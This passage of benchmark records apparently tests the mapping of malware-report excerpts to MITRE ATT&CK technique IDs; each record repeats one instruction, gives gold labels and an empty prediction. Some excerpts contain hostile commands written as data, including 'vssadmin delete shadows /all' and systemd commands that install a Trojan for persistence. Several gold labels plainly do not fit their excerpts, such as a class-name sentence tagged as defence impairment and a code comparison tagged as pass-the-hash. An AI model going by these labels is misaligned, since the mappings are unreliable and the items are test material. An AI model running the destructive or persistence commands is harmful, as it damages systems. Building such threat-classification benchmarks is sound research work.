+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Visitors are asked to download the \u201cUniversity Of Oxford Job Symposium Pre-Register Tool\u201d: The downloaded file (which is also signed with an AI Squared certificate), is a fake registration tool built by the attackers: OxfordSymposiumRegTool.exe f77ee804de304f7c3ea6b87824684b33 If run by the victim, their computer would get infected, while they are shown this registration process: Note that after completing the \u201cregistration process\u201d, the victim is asked to send the form to an email address in\u00a0oxford-careers[.]com, which also belongs to the attackers",
+ "gold": [
+ "T1057"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Verifies that there is no process with the name \u201crsyncd\u201d on the active process list (\u201cdbus-inotifier\u201d if the Trojan does not have root privileges)",
+ "gold": [
+ "T1057"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "It is created as a separate process instead of child process of Office applications",
+ "gold": [
+ "T1057"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "After writing to this file, the Trojan will enter a loop to continually to check for changes to the modification time of this file, effectively waiting for the actor to make modifications to the file",
+ "gold": [
+ "T1070.006"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "- There were two interesting sub-classes found inside Main Activity: Receiver\u00a0and\u00a0Sender",
+ "gold": [
+ "T1562.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "It appears the same actor developed both the Komplex and XAgentOSX tools, based on similarities within the following project paths found within the tools: Komplex: /Users/kazak/Desktop/Project/komplex XAgent OSX: /Users/kazak/Desktop/Project/XAgentOSX We believe it is possible that Sofacy uses Komplex to download and install the XAgentOSX tool to use its expanded command set on the compromised system",
+ "gold": [
+ "T1087"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "\"Section 1 The first section of the PowerShell script is responsible for setting different key variables that are used by the remaining sections of the PowerShell script, especially the following variables: TEMpPAtH = \"\"C:\\ProgramData\\\"\" (the path used for storing the temp files) Get_vAlIdIP = https://api.ipify.org/ (used to get the public IP address of the machine) FIlENAmePATHP = WindowsDefender.ini (file used to store Powershell code) PRIVAtE = Private Key exponents PUbLIc = Public Key exponents Hklm = \"\"HKLM:\\Software\\\"\" Hkcu = \"\"HKCU:\\Software\\\"\" ValuE = \"\"kaspersky\"\" SYSID DrAGon_MidDLe = [array of proxy URLs] Among those variables, there is one variable of particular interest, DrAGon_MidDLe, which stores the list of proxy URLs (detailed at the end of the blog in the Network Indicators portion of the Indicators of Compromise section) that will be used to interact with the C2 server, as shown in Figure 12\"",
+ "gold": [
+ "T1059.001",
+ "T1546.013"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "After decoding out the blob, analysts found a PowerShell script.",
+ "gold": [
+ "T1059.001",
+ "T1546.013"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "\"The macro contains a PowerShell script to persist in the \"\"Run\"\" registry key, \"\"KCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SystemTextEncoding\"\".\"",
+ "gold": [
+ "T1059.001",
+ "T1546.013"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "A code comparison of hash 12c786c490366727cf7279fc141921d8 with hash 6de6a0df263ecd2d71a92597b2362f2c (from November 28, 2017).\u00a0 Conclusion We have found what may be an early data-gathering stage for future possible heists from financial organizations in Turkey (and possibly other countries)",
+ "gold": [
+ "T1550.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The payload then calls the VirtualAllocEx API to create a buffer in the newly hollowed process and the WriteProcessMemory API to write the supplied data buffer that contains the code to inject to this newly created buffer",
+ "gold": [
+ "T1106"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "FInally , the newest sample uses dynamic API lookups to attempt to make static disassembly harder to understand.",
+ "gold": [
+ "T1106"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Unpacks the code in memory via process hollowing",
+ "gold": [
+ "T1055.012"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The specific sandbox checks include: Using WMI to check BIOS version (SMBIOSBIOSVERSION) for VBOX, bochs, qemu, virtualbox and vm",
+ "gold": [
+ "T1497.001",
+ "T1497"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Mouse Pointer Check The Trojan will perform the following WMI query: \u00a0 Select * from Win32_PointingDevice \u00a0 The Trojan will check the Caption, Description, HardwareType, InfSection, Manufacturer and Name fields in the results for the string VMware, Virtual, VBox, VM or Oracle",
+ "gold": [
+ "T1497.001",
+ "T1497"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The OopsIE payload checks to see if the result of this query as more than 0 elements to determine if it is running on a virtual machine",
+ "gold": [
+ "T1497.001",
+ "T1497"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Microphone, Voice IP applications",
+ "gold": [
+ "T1123"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "After the encryption of file, it will delete shadow copies with the command \u201c vssadmin delete shadows /all \u201d to ensure that all the data cannot be restored easily.",
+ "gold": [
+ "T1485"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Once encrypted, the system information is sent in the body of an HTTP POST",
+ "gold": [
+ "T1486"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "MS\\d{2}-\\d{3}",
+ "gold": [
+ "T1210"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "HKCU\\Software\\Microsoft\\Office test\\Special\\Perf",
+ "gold": [
+ "T1137"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "VPN and to persist in same sentence",
+ "gold": [
+ "T1133"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "C:\\Windows\\System32\\utilman.exe",
+ "gold": [
+ "T1546.008"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "!ExeCuteFile Executes a specified file using ShellExecuteA !DeleteFileFolder Deletes a file or a folder !SendkeyLogToServer Uploads the %TEMP%\\Save.tmp file to the C2 server !DeleteKeyloggerLog Deletes the %TEMP%\\Save.tmp file on the system Table 2 Commands available within MPK IRC Bot \u00a0 The post Magic Hound Campaign Attacks Saudi Targets appeared first on Palo Alto Networks Blog",
+ "gold": [
+ "T1070.004",
+ "T1074"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "^testmode Runs the test function to determine which DNS query types can successfully communicate with the C2 ^showconfig Creates a pipe delimited (\u201c|\u201d) string that contains the sample\u2019s settings, including the list of C2 domains and available DNS query types",
+ "gold": [
+ "T1008",
+ "T1071"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "10 Ensuring the files have been downloaded After the malware is downloaded and files verified, the script will check in the C:\\Program Files\\ directory for the presence Avast antivirus, which happens to be the most common installed AV worldwide",
+ "gold": [
+ "T1105",
+ "T1083"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "25 26 ix32.dll ix64.dll LoadLibrary call template dll is used by Reinstaller/Injector plugin (rsXX.dll) for injecting LoadLibrary call into running processes",
+ "gold": [
+ "T1055",
+ "T1574.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Additionally, the first stage JavaScript creates a scheduled task that executes the second stage code within a minute \u2013 this delayed execution helps to bypass behavior analysis since the second stage is not directly executed by the first stage",
+ "gold": [
+ "T1064",
+ "T1053.005",
+ "T1027",
+ "T1074"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "All subsequent messages are encrypted with AES in CBC mode",
+ "gold": [
+ "T1027",
+ "T1573"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Analyzing Gold Dragon As part of its initialization, Gold Dragon: Builds its imports by dynamically loading multiple APIs from multiple libraries Gains debug privileges (\u201cSeDebugPrivilege\u201d) for its own process to read remote memory residing in other processes The malware does not establish persistence for itself but for another component (if it is found) on the system: The malware begins by looking for an instance of the Hangul word processor (HWP) running on the system",
+ "gold": [
+ "T1055",
+ "T1057"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "An example of 1.hwp with registry and system information: Gold Dragon executes these steps executed in the exfiltration process: Once the malware has gathered the required data from the endpoint, it encrypts the data file 1.hwp using the password \u201cwww[dot]GoldDragon[dot]com\u201d The encrypted content is written to the data file 1.hwp",
+ "gold": [
+ "T1486",
+ "T1074"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "A number of commands are provided to the attackers, including the ability to download and execute additional information, upload documents of interest, and take screenshots of the desktop",
+ "gold": [
+ "T1113",
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Available Commands The XAgent C2 server will provide commands for the Trojan to run on the compromised system within its response to inbound HTTP request",
+ "gold": [
+ "T1059",
+ "T1071"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Buckeye has been known to exploit zero-day vulnerabilities in the past, such as CVE-2010-3962 in an campaign in 2010 and CVE-2014-1776 in 2014",
+ "gold": [
+ "T1068",
+ "T1203"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Building a client Build configuration Usage scenario Description Debug configuration Testing The pre-defined Settings.cs will be used, so edit this file before compiling the client",
+ "gold": [
+ "T1027",
+ "T1562.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Command Action sign Requests system information settings Requests settings from C2 server logs Uploads harvested passwords wallet Uploads harvested cryptocurrency wallet data proxy Indicates SOCKS proxy port opened miner Cryptocurrency miner commands error Reports errors to C2 server ddos DDoS attack commands Table 1: Zyklon accepted commands The following figures show the initial request and subsequent server response for the \u201csettings\u201d (Figure 13), \u201csign\u201d (Figure 14), and \u201cddos\u201d (Figure 15) commands",
+ "gold": [
+ "T1090",
+ "T1059"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Command Description search Searches for corresponding files search&upload Encrypts and adds the corresponding files to the upload directory with the provided name uploadfile Encrypts and adds the specified file to the upload directory with the provided name uploadfolder Encrypts and adds the mentioned directory to the upload directory with the provided name shellexecute Silently executes received command with cmd.exe wmic Silently executes received command with wmic.exe (for WMI commands) sendIEPass Encrypts and adds all gathered browser data into files for upload to C2 uninstall Removes files, directory and BITS tasks Cryptography To decrypt the configuration data, the malware uses XOR with 25-character keys such as \u201cwaEHleblxiQjoxFJQaIMLdHKz\u201d that are different for every sample",
+ "gold": [
+ "T1074",
+ "T1083",
+ "T1486",
+ "T1070.006",
+ "T1036",
+ "T1047"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Command Hash Command Name Description 0x0AA37987 loadconfig Runs each command specified in the configuration file (see the Configuration section)",
+ "gold": [
+ "T1016",
+ "T1070.006"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Comnie, first named by Sophos seemingly after the Windows LNK file name it created, is a custom malware family that is used in targeted attacks, and has been observed in the wild since at least April 2013",
+ "gold": [
+ "T1036",
+ "T1547.009"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Creates the service file /usr/lib/systemd/system/rsyncd.service [Unit]Description= synchronize and backup service.After=syslog.target [Service].ExecStart=/bin/rsyncd.OOMScoreAdjust=-500 [Install].WantedBy=multi-user.target Then it installs the service by executing the following commands: ln -s '/lib/systemd/system/rsyncd.service' '/etc/systemd/system/multi-user.target.wants /rsyncd.service' systemctl daemon-reload The running systemd process determines, which option will be used to register the Trojan in autorun",
+ "gold": [
+ "T1102",
+ "T1543.003",
+ "T1569.002",
+ "T1021",
+ "T1007"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Deletion of all registry keys associated with the extraction of the SFX RAR Deletion of the User Assist Key entries related to applications that have been recently executed Deletion of all registry keys relating to services that have recently run Clearly the attacker using this PlugX is paranoid about it being detected on disk, both in the registry and the file system",
+ "gold": [
+ "T1112",
+ "T1012",
+ "T1547.001"
+ ],
+ "predicted": ""
+ },
+ {
